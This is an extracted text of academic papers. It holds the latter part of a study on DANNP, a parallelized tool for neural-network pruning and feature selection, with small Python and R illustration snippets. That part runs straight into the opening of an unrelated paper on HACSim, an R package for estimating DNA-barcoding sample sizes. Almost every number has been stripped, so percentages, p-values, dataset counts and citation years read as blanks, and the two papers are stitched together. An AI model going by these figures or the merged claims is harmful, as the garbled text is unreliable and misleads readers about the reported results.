highest mse compared to the other algorithms for the remaining datasets. this is because the mp algorithm does not account for the effects of the removed weights on the network error (as mentioned in the ‘introduction’) and thus, tends to remove the incorrect weights, which may significantly increase the error. conversely, mwobs-parallel consistently achieved the minimum increase in the mse compared to the other pruning algorithms in all of the considered datasets. the application of obs-parallel and uobs-parallel algorithms is computationally prohibitive for anns with a large number of weights (i.e., for datasets with a higher number of input features or ann with a larger number of nodes in the hidden layer). as such, figs. a– e show the error curves for all pruning algorithms for smaller datasets (bc, hd, wdbc, pp, and ca) and figs. f– j and fig. 
s show the error curves only for mp and mwobs-parallel algorithms for the remaining datasets (pc, esr, lsvt, ulc, har, sm, tftf, aid, dcc, sdd, and md). from these results, we can generally conclude that in order to achieve the greatest reduction of the number of weights, while maintaining the lowest mse for ann during the training, the mwobs-parallel appears to consistently perform better than the other algorithms while being able to cope with more complex ann structures and datasets. estimates of model performance and pruning tradeoff less complex models are preferred over more complex as this may avoid overfitting the training data, helps increasing model interpretability, and helps reducing computation operations. in ann specifically, we analyze the effects of ann pruning on the cross- validation performance (see the methods section). figure shows the gm in the cross- validation and the number of weights in the pruned anns. notably, the pruning advantages may be seen in pc dataset, which originally requires a very complex ann structure as the samples are described by , input features. for pc dataset, the resulting ann from the mwobs-parallel retained ∼ weights as opposed to , weights in the unpruned ann (a reduction of % of the weights) with an improvement of . % in the gm. similarly, for pp and har datasets, we observe that mwobs-parallel reduced the number of weights by ∼ %, while achieving an improved performance with a gm of . %, compared to . % achieved by the unpruned ann for pp dataset, and . % compared to . % for har. the mwobs-parallel achieved similar results compared to the unpruned ann but it was able to reduce the number of weights by ∼ %, ∼ %, ∼ %,∼ %, %, %, and % for wdbc, esr, bc, md, sm, aid, and dcc datasets, alshahrani et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. figure effects of different pruning algorithms on ann performance on the training data. (a–e) datasets for which all ann pruning algorithms were completed within a given time limit. (f–j) datasets for which only mp and mwobs-parallel algorithms were completed within a given time limit. the x-axis represents the number of remaining weights after each pruning iteration, while the y-axis shows the train- ing mse. full-size doi: . /peerjcs. /fig- alshahrani et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure cross-validation performance and pruning trade-off. the colored bars represent the gm for each of the datasets, while the solid black line denotes the percentage of the remaining weights in the pruned ann. the uobs-parallel results for the pc dataset are not shown as the running time of the algo- rithm exceeded seven days. full-size doi: . /peerjcs. /fig- respectively. although mwobs-parallel considerably reduced the number of weights for hd, ulc, and sdd datasets, the mp algorithm achieved better results. finally, all pruning algorithms achieved worse performance than the unpruned ann in tftf dataset with a reduction of ∼ . % in the gm. table s shows the accuracy, precision, recall, f score, cohen’s kappa coefficient, and the percentage of the remaining weights in the ann for each dataset. ideally, we would hope that the pruned anns consistently achieve better results than the unpruned ann. 
however, the pruning effects are data dependent and may result in anns that, depending on the problem, show better, similar or worse performance compared to the unpruned anns. in this regard, the friedman’s test indicates that there is no significant difference (p-value of . ) in the gm performance between the unpruned and pruned anns by the different algorithms on our datasets. nevertheless, the pruned anns are considerably simpler, which reduces the computation demands and increases the interpretability of the model. moreover, the simpler models may arguably perform better for unseen samples, as the simpler models in principle generalize better because they are less likely to overfit the training data. overall, results in fig. show that our solutions are suitable for datasets with a small to a medium number of samples described by a relatively large number of input features. this is frequently the case for many classification problems in real applications. more importantly, mwobs-parallel can cope with complex ann structures where other pruning algorithms require considerably longer running times. alshahrani et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. ann pruning effects on data features and comparison to feature selection methods in addition, we exploit the resulting pruned ann for assessing and ranking the relevance of the data features. in this regard, we considered the selected features by the ann pruning and compared their predictive accuracy with seven state-of-the-art methods for fs. although there have been several attempts to use ann in fs for certain applications (becker & plumbley, ; dong & zhou, ; kaikhah & doddameti, ; setiono & leow, ), there are much faster and more efficient approaches for this guyon & elisseeff ( ). however, we show that through ann pruning, we can obtain more insights into the data by ranking and selecting the discriminative features, which is an additional information for users to explore for the problem at hand. as observed in fig. , pruning algorithms may significantly decrease the number of weights in an ann. with this reduction, some input features may lose their connecting weights to all nodes in the hidden layer (e.g., x in fig. b). this may help to infer the significance of the input features in a dataset. to demonstrate this, we performed pruning for the anns derived from the datasets until the mse exceeded a threshold on the validation data and discarded all input features without weights to the hidden layer. we then re-trained the ann using only the remaining features to observe how they affected the ann training and testing performance. table shows the gm for the anns derived by using the original set of features and the anns derived using the subset of features that had at least one connecting weight to the hidden layer after the ann pruning. consistent with fig. f, ann pruning selected only % of the features ( out of , ) for pc dataset while improving the gm by ∼ . % compared to the more complex ann derived using the original feature set. in general, eight datasets (pc, aid, sm, ca, lsvt, tftf, har, and wdbc) show a considerable reduction of the input features (from % to %). 
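a comparable check can be reproduced with off-the-shelf tools; the sketch below is an illustration under stated assumptions (scikit-learn, its bundled breast-cancer data as a stand-in for the datasets in table , and hypothetical indices of surviving features), evaluating a feature subset with a naïve bayes classifier under k-fold cross-validation and reporting the gm of sensitivity and specificity.

```python
import numpy as np
from sklearn.datasets import load_breast_cancer
from sklearn.model_selection import StratifiedKFold
from sklearn.naive_bayes import GaussianNB
from sklearn.metrics import confusion_matrix

def gm_cv(X, y, feature_idx, k=10):
    """k-fold cross-validated geometric mean of sensitivity and specificity for a feature subset."""
    gms = []
    for train, test in StratifiedKFold(n_splits=k, shuffle=True, random_state=0).split(X, y):
        clf = GaussianNB().fit(X[train][:, feature_idx], y[train])
        tn, fp, fn, tp = confusion_matrix(y[test], clf.predict(X[test][:, feature_idx])).ravel()
        gms.append(np.sqrt((tp / (tp + fn)) * (tn / (tn + fp))))
    return float(np.mean(gms))

X, y = load_breast_cancer(return_X_y=True)
selected = [0, 3, 7, 20, 27]          # hypothetical surviving-feature indices from pruning
print(gm_cv(X, y, selected))
```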
the achieved gm of the ann derived using the feature subset from pruning improved in eight datasets (sm, pc, tftf, aid, ulc, har, esr, and lsvt), remained relatively the same in four datasets (bc, wdbc, dcc, and md), and decreased in four (hd, pp, ca, and sdd). these results suggest that some classification problems are described by a less redundant set of features, or that the fs methods were not able to discriminate well between the redundant and the non-redundant features. as such, the negative effects of fs on the gm for the hd, pp, ca, and sdd datasets indicate that fs may not be useful for all datasets. this may be the case when the data samples are defined by an already small number of highly non-redundant features (as in the hd dataset) or simply when the features are weakly correlated or uncorrelated. nevertheless, the wilcoxon signed-rank test indicates that anns using a reduced feature set perform equally well compared to the unpruned anns (p-value of . ), while being considerably simpler and possibly more generalizable. here, we should note that for nine datasets (wdbc, sm, pc, tftf, aid, ulc, har, esr, and lsvt) out of , the pruned anns achieved better performance than the unpruned anns.

table: selection of the input features through the ann pruning and the effect on performance. the anns were trained on % of the data using the selected feature set, % was used for validation and % for testing. the bolded numbers represent the highest achieved performance with the pruned and/or unpruned network. for each of the datasets (breast cancer (bc), heart disease (hd), wisconsin breast cancer (wdbc), promoters prediction (pp), cardiac arrhythmia (ca), synthetic madelon (sm), prostate cancer (pc), tf-tf combinations (tftf), aid compounds (aid), urban land cover (ulc), sensorless drive diagnosis (sdd), default credit cards (dcc), human activity recognition (har), epileptic seizure recognition (esr), lsvt voice rehabilitation (lsvt), and mnist digits (md)), the table reports the percentage of remaining input features and the gm (%) of the unpruned and the pruned ann.

although the results from the table give an insight into the effects of fs by ann pruning, we asked how this would compare to other fs methods. for this, we performed a comprehensive analysis to investigate the ann pruning effects on the input features using mwobs-parallel, and compared it with seven state-of-the-art methods for fs. figures a–p show the comparison of the cross-validation results obtained from a naïve bayes classifier derived by using the different subsets of features. interestingly, when considering % or more of the top-ranked features, the feature subset determined by mwobs-parallel outperformed all methods for fs in two datasets (har and ulc). moreover, the feature subset obtained through mwobs-parallel consistently achieved comparable performance in the remaining datasets compared to the other methods for fs, with wdbc, pp, and md being the exceptions.
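a rough analogue of this comparison can be cross-validated by hand: train a naïve bayes classifier on nested subsets of top-ranked features and record the accuracy. the sketch below uses the e1071 package and a stand-in variance-based ranking on a built-in dataset, so the data, ranking, and fold count are illustrative assumptions rather than the protocol used in the paper.

library(e1071)   # provides naiveBayes()

data(iris)
x <- iris[, 1:4]
y <- iris$Species
ranking <- order(-sapply(x, var))   # stand-in for a pruning-based feature ranking

cv_accuracy <- function(x, y, k = 5) {
  folds <- sample(rep(1:k, length.out = nrow(x)))
  mean(sapply(1:k, function(i) {
    fit  <- naiveBayes(x[folds != i, , drop = FALSE], y[folds != i])
    pred <- predict(fit, x[folds == i, , drop = FALSE])
    mean(pred == y[folds == i])
  }))
}

# accuracy when keeping the top 1, 2, ... ranked features
set.seed(42)
sapply(seq_along(ranking), function(m)
  cv_accuracy(x[, ranking[1:m], drop = FALSE], y))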
figure: performance comparison between the methods for fs and mwobs-parallel. (a–p) cross-validation accuracy results (see the methods section) obtained from a naïve bayes classifier derived by using different feature subsets.

given that many fs methods are heuristics when solving the combinatorial problem of fs, the results obtained by these methods and by ann pruning depend on the dataset; therefore, a specific method may be better than the others for a particular dataset. however, the results in fig. demonstrate that ann pruning is useful not only for reducing the complexity of the model, but also for gaining new insights about the data by being able to select and rank the relevant features. we point out that fs through ann pruning is a side benefit of the pruning process.

conclusion

the simplification of ann structures through pruning is of great importance for reducing overfitting during training and for deriving more robust models. although several ann pruning algorithms have been proposed, these algorithms are unable to cope with more complex ann structures in an acceptable amount of time if the performance of the pruned network has to be preserved. the obs algorithm is among the most accurate pruning algorithms for anns. overall, the main bottleneck of ann pruning algorithms based on obs is the computation of the h-inverse for the pruning of each weight. to address this problem, we implemented dannp, an efficient tool for ann pruning that implements a parallelized version of the algorithm for a faster calculation of the approximation of the h-inverse. the dannp tool provides four ann pruning algorithms, namely obs-parallel, uobs-parallel, mwobs-parallel, and mp. we considered datasets from different application domains and showed that mitigating overfitting using ann pruning may lead to comparable or even better accuracy compared to fully connected anns. although we have tested our tool on a set of selected datasets, we believe that it is able to cope with problems from different domains and is suitable for small to medium size data regarding the number of features and data instances. we assessed the running times and performance of the implemented pruning algorithms. our obs-parallel algorithm was able to speed up the ann pruning by up to eight times compared to the serial implementation of the obs algorithm on a -core machine. moreover, we show that mwobs-parallel produces results competitive with the other pruning algorithms while considerably reducing the running time. regarding the effects of pruning on performance, in eight out of the datasets the pruned anns result in a significant reduction in the number of weights, by % – %, compared to the unpruned anns. although the results show that the effects of ann pruning depend on the dataset, the pruned ann models maintained comparable or better accuracy. finally, we show that through ann pruning, input features may lose all outgoing weights to the hidden layer, resulting in the selection of features more relevant to the problem in question. we evaluated the features selected by ann pruning and demonstrated that this set is comparable in its discriminative capabilities to the feature sets obtained by the seven considered state-of-the-art methods for fs.
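the obs bottleneck recalled in the conclusion above can be made concrete with a toy sketch of a single obs pruning step, following the formulation of hassibi, stork & wolff: prune the weight with the smallest saliency w_q^2 / (2 [h^{-1}]_{qq}) and compensate by updating the remaining weights. this is a simplified dense-matrix illustration with made-up values, not dannp's parallel implementation.

# one obs step on a toy weight vector, assuming an already-computed
# (approximate) inverse hessian h_inv of the training error surface.
set.seed(7)
w     <- c(0.8, -0.05, 0.6, 0.01)                 # current weights
a     <- matrix(rnorm(16), 4, 4)
h_inv <- crossprod(a) + diag(4)                   # stand-in positive-definite h^{-1}

saliency <- w^2 / (2 * diag(h_inv))               # obs saliency of each weight
q <- which.min(saliency)                          # weight to prune

# weight update that compensates for removing w[q]
delta_w  <- -(w[q] / h_inv[q, q]) * h_inv[, q]
w_new    <- w + delta_w
w_new[q] <- 0                                     # enforce exact removal

list(pruned = q, saliency = round(saliency, 4), w_new = round(w_new, 4))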
although fs methods may be used to rank the features based on different statistical measures, we ranked the remaining features considering the sum of the absolute values of their associated network weights. therefore, the selection of relevant features and the ranking resulting alshahrani et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. from the ann pruning provides the user with more information about the classification problem at hand. the dannp tool can cope with complex and medium size datasets. acknowledgements we would like to thank john hanks for his suggestions during the implementation of the dannp tool and robert hoehndorf for discussions on the manuscript. additional information and declarations funding this work was supported by king abdullah university of science and technology (kaust) through the baseline fund bas/ / - - for vladimir b. bajic. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: king abdullah university of science and technology (kaust): bas/ / - - . competing interests vladimir b. bajic is an academic editor for peerj. author contributions • mona alshahrani conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, performed the computation work, reviewed drafts of the paper, development of the online tool. • othman soufan conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, performed the computation work, reviewed drafts of the paper, development of the online tool. • arturo magana-mora performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, reviewed drafts of the paper, development of the online tool. • vladimir b. bajic conceived and designed the experiments, wrote the paper, reviewed drafts of the paper. data availability the following information was supplied regarding data availability: the computational bioscience research center, kaust data is available as a supplemental file, and other raw data is at zenodo: https://zenodo.org/record/ . supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. alshahrani et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supplemental-information https://zenodo.org/record/ http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. references almeida js. . predictive non-linear modeling of complex data by artificial neural networks. current opinion in biotechnology ( ): – doi . /s - ( ) - . amdahl gm. . validity of the single processor approach to achieving large scale computing capabilities. afips conference proceedings : – doi . / . . anguita d, ghio a, oneto l, parra x, reyes-ortiz jl. . a public domain dataset for human activity recognition using smartphones. in: th european symposium on artificial neural networks, computational intelligence and machine learning, esann, bruges, belgium. ashoor h, magana-mora a, jankovic br, kamau a, awara k, chowdary r, archer jac, bajic vb. . 
recognition of translation initiation sites in arabidopsis thaliana. in: lecca p, tulpan d, rajaraman k, eds. systemic approaches in bioin- formatics and computational systems biology: recent advances. hershey, pa: igi publishing, – . bajic vb, seah sh, chong a, zhang g, koh jl, brusic v. . dragon promoter finder: recognition of vertebrate rna polymerase ii promoters. bioinformatics ( ): – doi . /bioinformatics/ . . . bajic vb, tan sl, suzuki y, sugano s. . promoter prediction analysis on the whole human genome. nature biotechnology : – doi . /nbt . bajic vb, werner t. . promoter prediction. in: encyclopedia of genetics, genomics, proteomics and bioinformatics, part bioinformatics, . . gene finding and gene structure. vol. . new york: john wiley & sons, ltd., – . basheer ia, hajmeer m. . artificial neural networks: fundamentals, comput- ing, design, and application. journal of microbiological methods ( ): – doi . /s - ( ) - . becker s, plumbley m. . unsupervised neural network learning procedures for feature extraction and classification. applied intelligence ( ): – doi . /bf . bishop cm. . pattern recognition and machine learning. vol. . new york: springer- verlag. blackford ls, demmel j, dongarra j, duff i, hammarling s, henry g, heroux m, kaufman l, lumsdaine a, petitet a, pozo r, remington k, whaley rc. . an updated set of basic linear algebra subprograms (blas). acm transactions on mathematical software ( ): – doi . / . . brown g, pocock a, zhao m-j, luján m. . conditional likelihood maximisation: a unifying framework for information theoretic feature selection. the journal of machine learning research ( ): – . burden f, winkler d. . bayesian regularization of neural networks. artificial neural networks: methods and applications : – . cybenko g. . approximation by superpositions of a sigmoidal function. mathemat- ics of control, signals and systems : – doi . /bf . alshahrani et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . / . http://dx.doi.org/ . /bioinformatics/ . . http://dx.doi.org/ . /nbt http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /bf http://dx.doi.org/ . / . http://dx.doi.org/ . /bf http://dx.doi.org/ . /peerj-cs. dias fm, antunes a, mota am. . artificial neural networks: a review of com- mercial hardware. engineering applications of artificial intelligence ( ): – doi . /j.engappai. . . . dong m, zhou x-s. . knowledge discovery in corporate events by neural network rule extraction. applied intelligence ( ): – doi . /s - - - . fernandez-delgado m, cernadas e, barro s. . do we need hundreds of classifiers to solve real world classification problems? journal of machine learning research ( ): – . fleuret f. . fast binary feature selection with conditional mutual information. the journal of machine learning research : – . gan r, chen n, huang d. . comparisons of forecasting for hepatitis in guangxi province, china by using three neural networks models. peerj :e doi . /peerj. . gardnera mw, dorlinga sr. . artificial neural networks (the multilayer perceptron)—a review of applications in the atmospheric sciences. atmospheric environment ( – ): – doi . /s - ( ) - . guyon i, elisseeff a. . an introduction to variable and feature selection. the journal of machine learning research : – . hall ma. . correlation-based feature selection for machine learning. hamilton: the university of waikato. hassibi b, stork dg, wolff gj. . optimal brain surgeon and general network pruning. 
in: ieee international conference on neural networks, , san francisco, ca, usa. doi . /icnn. . . hatzigeorgiou a. . translation initiation start prediction in human cdnas with high accuracy. bioinformatics ( ): – . hernández-serna a, jiménez-segura f. . automatic identification of species with neural networks. peerj :e doi . /peerj. . hornik k, stinchcombe m, white h. . multilayer feedforward networks are universal approximators. neural networks ( ): – doi . / - ( ) - . jayne c, iliadis l, mladenov v. . special issue on the engineering applica- tions of neural networks. neural computing and applications ( ): – doi . /s - - - . johnson b, xie z. . classifying a high resolution image of an urban area using super- object information. isprs journal of photogrammetry and remote sensing : – doi . /j.isprsjprs. . . . kaikhah k, doddameti s. . discovering trends in large datasets using neural networks. applied intelligence ( ): – doi . /s - - - . kalkatawi m, rangkuti f, schramm m, jankovic br, kamau a, chowdary r, archer ja, bajic v. . dragon polya spotter: predictor of poly(a) motifs within human genomic dna sequences [abstract ]. bioinformatics ( ) doi . /bioinformatics/btt . karnin ed. . a simple procedure for pruning back-propagation trained neural net- works. neural networks, ieee transactions on ( ): – doi . / . . alshahrani et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j.engappai. . . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /peerj. http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /icnn. . http://dx.doi.org/ . /peerj. http://dx.doi.org/ . / - ( ) - http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /j.isprsjprs. . . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /bioinformatics/btt http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. kira k, rendell la. . the feature selection problem: traditional methods and a new algorithm. in: aaai ’ proceedings of the tenth national conference on artificial intelligence, san jose, california—july – , . klima g. . a new approach towards implementing artificial neural networks. lecun y, denker js, solla sa, howard re, jackel ld. . optimal brain damage. in: paper presented at the nips. li z, li y, sun l, tang y, liu l, zhu w. . artificial neural network cascade identifies multi-p inhibitors in natural compounds. peerj :e doi . /peerj. . lichman m. . uci machine learning repository. available at http://archive.ics.uci. edu/ml/index.php. magana-mora a, ashoor h, jankovic br, kamau a, awara k, chowdary r, archer jac, bajic vb. . dragon tis spotter: an arabidopsis-derived pre- dictor of translation initiation sites in plants. bioinformatics ( ): – doi . /bioinformatics/bts . magana-mora a, bajic vb. . omniga: optimized omnivariate decision trees for generalizable classification models. scientific reports :article doi . /s - - - . magana-mora a, kalkatawi m, bajic vb. . omni-polya: a method and tool for accurate recognition of poly(a) signals in human genomic dna. bmc genomics ( ):article doi . /s - - - . meireles mrg, almeida pem, simoes mg. . a comprehensive review for industrial applicability of artificial neural networks. ieee transactions on industrial electronics society ( ): – doi . /tie. . . mozer mc, smolensky p. . skeletonization: a technique for trimming the fat from a network via relevance assessment. in: advances in neural information processing systems. ng ay. . feature selection, l vs. l regularization, and rotational invariance. 
in: icml ’ proceedings of the twenty-first international conference on machine learning, banff, alberta, canada—july – , . norgaard m, ravn o, poulsen nk. . nnsysid-toolbox for system identification with neural networks. mathematical and computer modelling of dynamical systems ( ): – doi . /mcmd. . . . . nowlan sj, hinton ge. . simplifying neural networks by soft weight-sharing. neural computation ( ): – doi . /neco. . . . . peng h, long f, ding c. . feature selection based on mutual information criteria of max-dependency, max-relevance, and min-redundancy. ieee transactions on pattern analysis and machine intelligence ( ): – doi . /tpami. . . prechelt l. . early stopping—but when? in: neural networks: tricks of the trade. lecture notes in computer science, vol. . berlin, heidelberg: springer, – . reed r. . pruning algorithms-a survey. ieee transactions on neural networks ( ): – doi . / . . riedmiller m. . rprop-description and implementation details. technical report. karlsruhe, university of karlsruhe. alshahrani et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj. http://archive.ics.uci.edu/ml/index.php http://archive.ics.uci.edu/ml/index.php http://dx.doi.org/ . /bioinformatics/bts http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /tie. . http://dx.doi.org/ . /mcmd. . . . http://dx.doi.org/ . /neco. . . . http://dx.doi.org/ . /tpami. . http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. schmeier s, jankovic b, bajic vb. . simplified method to predict mutual interac- tions of human transcription factors based on their primary structure. plos one ( ):e doi . /journal.pone. . setiono r, leow wk. . fernn: an algorithm for fast extraction of rules from neural networks. applied intelligence ( – ): – doi . /a: . singh d, febbo pg, ross k, jackson dg, manola j, ladd c, tamayo p, renshaw aa, d’amico av, richie jp. . gene expression correlates of clinical prostate cancer behavior. cancer cell ( ): – doi . /s - ( ) - . soufan o, ba-alawi w, afeef m, essack m, rodionov v, kalnis p, bajic vb. a. mining chemical activity status from high-throughput screening assays. plos one ( ):e doi . /journal.pone. . soufan o, kleftogiannis d, kalnis p, bajic vb. b. dwfs: a wrapper feature selection tool based on a parallel genetic algorithm. plos one ( ):e doi . /journal.pone. . srivastava n, hinton g, krizhevsky a, sutskever i, salakhutdinov r. . dropout: a simple way to prevent neural networks from overfitting. the journal of machine learning research ( ): – . stahlberger a, riedmiller m. . fast network pruning and feature extraction by using the unit-obs algorithm. advances in neural information processing systems : – . tsanas a, little ma, fox c, ramig lo. . objective automatic assessment of rehabil- itative speech treatment in parkinson’s disease. ieee transactions on neural systems and rehabilitation engineering ( ): – doi . /tnsre. . . wan l, zeiler m, zhang s, cun yl, fergus r. . regularization of neural networks using dropconnect. in: proceedings of the th international conference on machine learning (icml- ). wang c-c, tan k-l, chen c-t, keerthi ss, mahajan d, sundararajan s, lin c-j. . distributed newton methods for deep learning. technical report. national taiwan university. wang y, song w, wu j, z zl, mu f, li y, huang h, zhu w, zhang f. . modeling using clinical examination indicators predicts interstitial lung disease among patients with rheumatoid arthritis. peerj :e doi . /peerj. . yang h, moody j. . 
feature selection based on joint mutual information. in: proceedings of international icsc symposium on advances in intelligent data analysis. yeh ic, lien ch. . the comparisons of data mining techniques for the predictive ac- curacy of probability of default of credit card clients. expert systems with applications ( ): – doi . /j.eswa. . . . alshahrani et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /a: http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /tnsre. . http://dx.doi.org/ . /peerj. http://dx.doi.org/ . /j.eswa. . . http://dx.doi.org/ . /peerj-cs. submitted july accepted november published january corresponding author jarrett d. phillips, jphill @uoguelph.ca academic editor gang mei additional information and declarations can be found on page doi . /peerj-cs. copyright phillips et al. distributed under creative commons cc-by . open access hacsim: an r package to estimate intraspecific sample sizes for genetic diversity assessment using haplotype accumulation curves jarrett d. phillips , steven h. french , robert h. hanner and daniel j. gillis school of computer science, university of guelph, guelph, ontario, canada department of integrative biology, biodiversity institute of ontario, university of guelph, guelph, ontario, canada abstract assessing levels of standing genetic variation within species requires a robust sampling for the purpose of accurate specimen identification using molecular techniques such as dna barcoding; however, statistical estimators for what constitutes a robust sample are currently lacking. moreover, such estimates are needed because most species are currently represented by only one or a few sequences in existing databases, which can safely be assumed to be undersampled. unfortunately, sample sizes of – specimens per species typically seen in dna barcoding studies are often insufficient to adequately capture within-species genetic diversity. here, we introduce a novel iterative extrapolation simulation algorithm of haplotype accumulation curves, called hacsim (haplotype accumulation curve simulator) that can be employed to calculate likely sample sizes needed to observe the full range of dna barcode haplotype variation that exists for a species. using uniform haplotype and non-uniform haplotype frequency distributions, the notion of sampling sufficiency (the sample size at which sampling accuracy is maximized and above which no new sampling information is likely to be gained) can be gleaned. hacsim can be employed in two primary ways to estimate specimen sample sizes: ( ) to simulate haplotype sampling in hypothetical species, and ( ) to simulate haplotype sampling in real species mined from public reference sequence databases like the barcode of life data systems (bold) or genbank for any genomic marker of interest. while our algorithm is globally convergent, runtime is heavily dependent on initial sample sizes and skewness of the corresponding haplotype frequency distribution. subjects bioinformatics, computational biology, data science, optimization theory and computation, scientific computing and simulation keywords algorithm, dna barcoding, extrapolation, iterative method, sampling sufficiency, species introduction background earth is in the midst of its sixth mass extinction event and global biodiversity is declining at an unprecedented rate (ceballos et al., ). 
it is therefore important that species genetic diversity be catalogued and preserved. one solution to address this mounting crisis in a how to cite this article phillips jd, french sh, hanner rh, gillis dj. . hacsim: an r package to estimate intraspecific sample sizes for genetic diversity assessment using haplotype accumulation curves. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com/computer-science mailto:jphill @uoguelph.ca https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. systematic, yet rapid way is dna barcoding (hebert et al., ). dna barcoding relies on variability within a small gene fragment from standardized regions of the genome to identify species, based on the fact that most species exhibit a unique array of barcode haplotypes that are more similar to each other than those of other species (e.g., a barcode ‘‘gap’’). in animals, the dna barcode region corresponds to a bp fragment of the ′ terminus of the cytochrome c oxidase subunit i (coi) mitochondrial marker (hebert et al., ; hebert, ratnasingham & de waard, ). a critical problem since the inception of dna barcoding involves determining appropriate sample sizes necessary to capture the majority of existing intraspecific haplotype variation for major animal taxa (hebert et al., ; meyer & paulay, ; ward et al., ). taxon sample sizes currently employed in practice for rapid assignment of a species name to a specimen, have ranged anywhere from – specimens per species (matz & nielsen, ; ross, murugan & li, ; goodall- copestake, tarling & murphy, ; jin, he & zhang, ; yao et al., ); however, oftentimes only – individuals are actually collected. this trend is clearly reflected within the barcode of life data systems (http://www.boldsystems.org) (ratnasingham & hebert, ), where an overwhelming number of taxa have only a single record and sequence. a fitting comparison to the issue of adequacy of specimen sample sizes can be made to the challenge of determining suitable taxon distance thresholds for species separation on the basis of the dna barcode gap (meyer & paulay, ). it has been widely demonstrated that certain taxonomic groups, such as lepidoptera (butterflies/moths), are able to be readily separated into distinct clusters largely reflective of species boundaries derived using morphology (Čandek & kuntner, ). however, adoption of a fixed limit of % difference between maximum intraspecific distance and minimum interspecific (i.e., nearest-neighbour) divergence is infeasible across all taxa (hebert, ratnasingham & de waard, ; collins & cruickshank, ). species divergence thresholds should be calculated from available sequence data obtained through deep sampling of taxa across their entire geographic ranges whenever possible (young et al., ). there is a clear relationship between specimen sample sizes and observed barcoding gaps: sampling too few individuals can give the impression of taxon separation, when in fact none exists (meyer & paulay, ; hickerson, meyer & moritz, ; wiemers & fiedler, ; dasmahapatra et al., ; Čandek & kuntner, ), inevitably leading to erroneous conclusions (collins & cruickshank, ). it is thus imperative that barcode gap analyses be based on adequate sample sizes to minimize the presence of false positives. 
introducing greater statistical rigour into dna barcoding appears to be the clear way forward in this respect (nielsen & matz, ; Čandek & kuntner, ; luo et al., ; phillips, gillis & hanner, ). the introduction of computational approaches for automated species delimitation such as generalized mixed yule coalescent (gmyc) (pons et al., ; monaghan et al., ; fujisawa & barraclough, ), automatic barcode gap discovery (abgd) (puillandre, lambert & brouillet, ) and poisson tree processes (ptp) (zhang et al., ) has greatly contributed to this endeavour in the form of web servers (gmyc, abgd, ptp) and r packages (gmyc: species’ limits by threshold statistics, splits (ezard, fujisawa & barraclough, )). phillips et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.boldsystems.org http://dx.doi.org/ . /peerj-cs. various statistical resampling and population genetic methods, in particular coalescent simulations, for the estimation of sample sizes, have been applied to lepidoptera (costa rican skipper butterflies (astraptes fulgerator)) (zhang et al., ) and european diving beetles (agabus bipustulatus) (bergsten et al., ). using wright’s equilibrium island model (wright, ) and kimura’s stepping stone model (kimura & weiss, ) under varying effective population sizes and migration rates, zhang et al. ( ) found that between - specimens per species were necessary to observe % of all estimated coi variation for simulated specimens of a. fulgerator. conversely, real species data showed that a sample size of - individuals is probably needed to capture the majority of coi haplotype variation existing for this species (zhang et al., ). a subsequent investigation carried out by bergsten et al. ( ) found that a random sample of individuals was required to uncover % coi diversity in a. bipustulatus; whereas, a much smaller sample size of specimens was necessary when geographic separation between two randomly selected individuals was maximized. others have employed more general statistical approaches. based on extensive simulation experiments, through employing the central limit theorem (clt), luo et al. ( ) suggested that no fewer than individuals per species be sampled. conversely, using an estimator of sample size based on the method of moments, an approach to parameter estimation relying on the weak law of large numbers (pearson, ), sample sizes ranging from – , individuals across species of ray-finned fishes (chordata: actinopterygii) were found by phillips et al. ( ). haplotype accumulation curves paint a picture of observed standing genetic variation that exists at the species level as a function of expended sampling effort (phillips et al., ; phillips, gillis & hanner, ). haplotype sampling completeness can then be gauged through measuring the slope of the curve, which gives an indication of the number of new haplotypes likely to be uncovered with additional specimens collected. for instance, a haplotype accumulation curve for a hypothetical species having a slope of . suggests that only one previously unseen haplotype will be captured for every individuals found. this is strong evidence that the haplotype diversity for this species has been adequately sampled. thus, further recovery of specimens of such species provide limited returns on the time and money invested to sequence them. trends observed from generated haplotype 